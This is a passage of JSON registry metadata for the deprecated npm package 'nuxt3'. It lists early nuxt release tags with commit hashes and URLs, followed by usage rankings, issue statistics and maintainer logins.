ommit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2026-02-13T22:29:51.155Z","dependent_packages_count":104,"downloads":3288,"downloads_period":"last-month","dependent_repos_count":479,"rankings":{"downloads":1.4139203052906086,"dependent_repos_count":0.7755163496589259,"dependent_packages_count":0.35574276268029337,"stargazers_count":0.15559799533710655,"forks_count":0.5233980135042239,"docker_downloads_count":1.3900064427172902,"average":0.7690303115314081},"purl":"pkg:npm/nuxt3","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/nuxt3","docker_dependents_count":2,"docker_downloads_count":39,"usage_url":"https://repos.ecosyste.ms/usage/npm/nuxt3","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/nuxt3/dependencies","status":"deprecated","funding_links":["https://opencollective.com/nuxtjs","https://github.com/sponsors/nuxt"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"